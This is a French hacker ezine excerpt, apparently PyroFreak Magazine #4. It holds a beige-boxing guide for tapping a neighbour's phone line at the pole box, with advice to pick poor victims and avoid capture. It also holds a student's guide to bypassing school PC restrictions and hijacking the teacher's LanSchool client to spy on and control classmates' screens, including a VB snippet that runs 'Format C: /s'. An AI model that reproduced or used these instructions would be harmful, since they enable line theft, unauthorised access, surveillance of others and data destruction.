==============================


Avant propos :
--------------

CECI PEUT TRE TRS DANGEUREUX, JE NE VOUS FORCE PAS A FAIRE AUCUNE DES
CHOSES ET EST DIT DANS CE TEXTE, JE NE FAIT QUE VOUS INFORMER C'EST
TOUT. ALOS SI VOUS VOUS FAITES LECTROCUTER EN FAISANT CELA, C'EST PAS
DE MA FAUTE J'AI DIT CE QUE J'AVAIS  DIRE ALORS MAINTENANT LA SEULE
PERSONNE QUI PEUT TER DANS LE TORD EST VOUS MME !!!

MERCI, 
endrix


Comment ca marche :
-------------------

Le Beige Boxing sert  se connecter  une ligne qui n'est pas la votre
pour pouvoir connecter et faire vos choses sans que ce soit de chez
vous. Donc pour se faire, vous aurez besoin de trouver quelques
victimes vulnrables  ce genre d'attaque(une facon de dire les 
choses, hehe) et je vous souhaite de prendre des vistimes qui sont pas
trs riche comme ca souvent la centrale(Bell) va prendre beaucoup plus
de temps a ragir a cela mais si la personne est riche, quand tu as de 
l'argent, tout va plus vite et mieu :)

Je tiens a dire que cette box est sourtout bonne en France MAIS elle
fonctionne au Qubec aussi !!! Je sais, je l'ai essayer avec des amis
l'autre jour


Matriels :
-----------

- Un tlphone a quadran numrique
- 3 Pinces crocodiles
- Un fer a couder
- Tourne-Vis
- Couteau
- SaC  dos(de prfrence, voir plus loin pour plus d'info)


Fabrication de la boite :
-------------------------


1 - Prendre le tlhone, et le dmonter doucement avec le tourne-vis
    de facon d'avoir access  l'intrieur mais il faut pouvoir le remonter :)

Notes : Vous allez voir 4 fils : Bleu, Blanc, Rouge et Jaune


2 - Prendre une pince pour chaque fils et le saouder dessus

Notes : Dgeiner le fil avant de faire ca avec le couteau


3 - Maintenant, aller vous trouvez une victime. Ceci peut tre umpeu dr 
    parce que dite vous qu'il va falloir que vous alliez monter dans le poteau
    de Bell ou les lignes de tlphones et ou vous allez pouvoir voir la bote
    anti-foudre(FT). Pour les reconnaitres, c'est pas trs dr, c'est une boite
    Blanche qui a une insigne "FT".

Extras : Quand vous allez avoir ouvert la boite, vous allez voir plusieurs fils
 donc 2, le fil blanc et le fil gris. Maintenant, il faut les dnuders sans
         les coupers(IMPORTANT!!!!!!!!) Maintenant ils faut brancher la pince blanche
         sur le fil blanc et la pince rouge sur le fil gris. Dcrochez le tlphone, 
         vous avez le tone ???? Si oui... YESSSsssSSS !!! Sinon, choisissez un autre fil
         blanc et un autre fil gris. 

Bon alors maintenant, vous savez ce que vous avez a faire, si vous voullez mettre
cette personne dans la merde, vous avez juste  redessendre et brancher votre portable
sur le fil et faire une petite attaque sur un serveur..... :))))


Comment ne pas se faire prendre :
---------------------------------

1 - Ne pas trop endomager la boite aprs utilisation
2 - Ne pas faire trop de bruit
3 - Passer  l'action aprs minuit
4 - Ne pas choisir une personne qui vous connais
5 - Je suis sr que vous en savez d'autres..


Conclusion :
------------

Bon hey bien j'espre que vous allez vous amusez avec tout ca :)

Ne vous faites pas prendre les enfants!!

- endrix



 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #4
: 
| Hacking sur les ordis de l'cole 
'.________ __ __ ___________ ____ ____________ ____Par CyberRider __



Bon dan cette article je vous explique comment hacker votre cole ! bon faut
sentendre la on changera pas nos notes je vous dis seulement style avoir des
acces de prof bon avoir accces aux autre ordi des chose du genre ts! Bon
pour commencer je vais vous dir a ecole je suis pis la commision scolaire car
la commision scolaire doit etre baser sur sa au complet tk! on sen fou bon!
ok jai rediger cette article a partir du locla 204-c ou b tk peut importe de
lecole la courvilloise euh de la commision scolaire des premeire seigneurie
donc pomal toute les autre ecole de cette commision doit marcher aec les meme
programme mais bon la je le fait sur la courvi c simple!!

Premier Tips & Tricks! (win95/98)

Quand vous etes dans lordi de lecole vous avez que 3 choix dans le menu
demarrer program aide et rechercher vous avez pas le executer! zute on peut
pa chier grand chose vous vous dites! vous vous trompez!! ouvrez le plus gros
prog de hack au monde qui est a dir paint brush! lol bon vous aller dans
ouvrir tu fait tous *.* et tu va au repertoir ou se situe le fichier que tu
veut ouvrir! tu selectionne el fichier et tu click dessus avec lautre piton
la ta proprit et plein d autre truc don le premeir de la liste qui est
Ouvrir ;) alors tu tu selectionne le ouvrir et sa va partir le programme ;))
c cool hein! Paint brush est util enfin ;)))


Deuxieme Tips & Tricks!

Tu est sous win 3.1 et tu veut faire la meme chose qu au type #1 ta pas
executer bon bon bon ta un ta 3 choix mais qui soffre pas a tous le monde
dsoler!! tu as VB3 sur le win 3.1 se qui serait cool! ou ta une icon qui
execute un .bat a kekpart! ou bien ta microsoft acces! Bon si ta vb fait toi
ton propre executer c simple :

sub execute ()
Dim prog
Dim x
Prog = "Format C: /s"
x = Shell (prog, 1)
End Sub

ok Stai tres simple sa! mais bon fait pas de formatte c : la quand meme!!
ensuite tu as pas vb3 mais ya une icon a kekpart qui execute un .bat cherchez
c est sur qui en a surment une!! alors tu trouve le .bat qui se fait executer
et tu va le modifier avec notepad et tu rentre le path et le fichier et up
quand tu clcik sur licon sa execute ton bat et ton prog du emem coup ;))

Ok maintenant ta pas vb3 ni de .bat mais tu a microsoft access hmm c cool sa
peut etre tres simpel ;)) ouvre le fait toi une nouvelle base de don la tu
fait un fromulaire vierge c simple et ensuite tu met un boutton sa va touvrir
un assitant la tu chercher dans les choix de boutton et tu remakr qui yen a
un que cest executer une application tu selectionne sa tu donne le path de
ton app et up run ton formulaire pese sur ton boutton et le tour est jouer!!!


Bon ok c est fini pour les type n tricks pkoi je vous explique comment
executer des app sur des ordi qui ne peuvent pas c simple faut bin ouvrir des
fichier quon a pas acces! hein ;)) alors bon maintenant quon est a la courvi
on sais que notre proff a lanschool qui fait toujours planter nos pc srieux
ya rien de plus chiant que le prof qui part le broadcasting et nous explique
des chose quon sais ts! bont k la on sais qui a sa alors on sais qui a un
client pour les eleves et un client pour els prof qui nous font chier bon!
Mais techniquement les prof sont pas fou ilss vont emttre le programm lan
school sur leur server principal ( la courvi ya 2 server principal dison
jcrois yen a plus mais bon! ya Courv_Apo1 et Courv_Apo2 le 1 cest win 3.1 et
le 2 win95!) bon sur le server rpincipal nos ordi en se laodant ouvree le
prog Wstudent.exe qui est le lanschool pour les eleve qui permet au prof
daller voir tous ha les maudit mais techniquement encor si on a pu laoder
Wstudent.exe donc on a acces au repertoire de lanschool et puis si il
linstall seulement sur un srerver c car ya le client prof sur le meme rep !!
Vous aller me dir non! bin moi je repond oui c con mais oui Wteacher.exe est
dans le meme rep donc si on fait un tips n tricks et quon rouvre le fichier
win.ini i doit avoir des ligne au debut qui ressemble a sa!


[windows]
load=
run=\\Courv_apo2\lepaht de merde a la con de lanschool\Wstudent.exe
NullPort=None
device=EPSON Stylus COLOR 400,EPS400,LPT2: 


donc la on pogne le path de lanschool c pas bete hein!bon une fois quon a le
path de lanschool que voulez vous faire bon on peut toujours changer le
win.ini et marker Wteacher.exe a place mais tous les autre user apres aurons
droit a lanschool pour les prof non on veut pas etre 10 a lavoir on veut etre
le seul elite a rire de tous le monde!! donc on va dans paintbrush et on tape
sa!
//courv_apo2\le path de lanschool a lacon\
enter
la on est dans le rep de lanschool up ;) on fait afficher tous les fichier!
et on voie Wteacher.exe hmm je me demande ske c ?? hehehehe alors on louvre a
la technique tips n tricks #1 lol et on optient le lanschoodes prof !! il
souvre sur la bar de tache et on peu le controler en clickant dessus sur
lautre boutton on voit view student Broadcasting etc... bon broadcasting tous
les eleve vont voir votre ecran donc! on touche pas tu suite view hmm
interressant la on ouvre sa la sa fait un decompte de 100 poste et + et sa
trouve tous les poste docn unc oup que cest fini on a obtenu tous le spsote
alors onc heck les numero des poste et on voit ski font on peut aussi faire
ski font a leur place lol genre yecrive un text toi tu pese sur backspace des
truc du genre aller sur demarrer fermer lordi entk mais le suel prob que jai
trouver cest que a courvi toute les poste sappelait elev204 sa va bin ts!!
imagine sont sous win95 quekun amen un nuke sur une diskette (un lamerz
binsur) la lui y veut nuker kekun i mark a palce du ip elev204 ouch me
demande ske sa ferais probablement nuker tous les elev204 hehehehe entk!! c
pomla sa pour le hacking des ecole et de la courvie!!

bon vous ske vous voulez c avoir tous les item dans le menu demarrer ok 
ouvrez le system.ini euh descendez ici:

[boot]
system.drv=system.drv
drivers=mmsystem.dll power.drv
user.exe=user.exe
gdi.exe=gdi.exe
sound.drv=mmsound.drv
dibeng.drv=dibeng.dll
comm.drv=comm.drv
shell=Explorer.exe
keyboard.drv=keyboard.drv
fonts.fon=vgasys.fon
fixedfon.fon=vgafix.fon
oemfonts.fon=vga850.fon
386Grabber=vgafull.3gr
display.drv=pnpdrvr.drv
mouse.drv=mouse.drv
*DisplayFallback=0

vous voyez a shell c marker explorer.exe bon sur le mien c explorer.exe mais
sur les ecole sa peut etre autre chose ou bin y peut avoir des command line
en arriere alors arrenger vous pour marker explorer.exe ou aller marker
\\courv_apo\c\windows\explorer.exe comme sa vous etes sur davoir le meme
shell que votre prof ;)) bon entk si sa amrche pas et tout et tous bin c
jsute des test pendant 75 minute que jai donc 20 minute que je tapais un text
alors jai pas euh le temp de checker plus de possibiliter de hack sur les pc
de elcole dsoler il y aura probeblement une belle suite!!

Tous les truck de cette article vienne de moi jai est trouver en aillant
rien a faire et a force de gosser tk take care , keep hacking and have phun
with your school!!

cYBERrIDER



========================================================================
Conclusion


Hey bien voici encore un autre ezine qui vient de ce terminer!!! J'espre
que vous l'avez aimer la :)

L't est arriv, enfin!! Alors la c'est le temps de faire autre chose que
de rester en face de vos crans, profiter de la vie, fter en masse faite toute
les choses que vous ne pouvez pas faire en temps normal, c'est le temps. La crew
de pyrofreak allons cesser nos activits durant cet t pour profiter de la vie
en tant que jeune mais vous pouvez toujours nous contacter par courrier lectronique
alors j'espre que vous allez passer un bel t et faites attention avec vous parce
qu'en revenant, le meilleur s'en vient !!!!!!!!!!

- endrix[paroles du groupe]
========================================================================







	                                     _   _
                         	      	'::-::`
    	       	                         (o o)    	
                                       ooO--(_)--Ooo-
            cOPYRIGHT (c) tOUT lES dROITS rSERVS  pYRO-pHREAKERS mAGAZINE
